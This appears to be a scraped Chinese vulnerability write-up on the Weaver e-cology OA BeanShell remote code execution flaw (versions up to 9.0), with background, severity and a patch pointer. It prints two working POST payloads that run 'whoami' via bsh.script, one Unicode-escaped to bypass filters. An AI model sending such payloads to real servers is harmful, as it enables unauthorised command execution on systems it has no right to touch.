泛微ecology OA远程代码执行漏洞BeanShell检测与补丁(BSH漏洞)
事件背景 2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。 影响版本 e-cology <=9.0 威胁等级 高危 漏洞复现 泛微OA BeanShell复现测试:地址 print命令 exec命令 Post提交数据 Poc1:bsh.script=exec("whoami") Poc2:bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw Poc3: 批量验证脚本 该脚本组合了常用的泛微OA web路径,加上本文讲解绕过过滤器的3个Poc。该工具仅用于测试研究使用请勿他用。 泛微官方安全补丁 免责声明 ![]() 长按识别关注老子有钱娱乐城微信公众号 |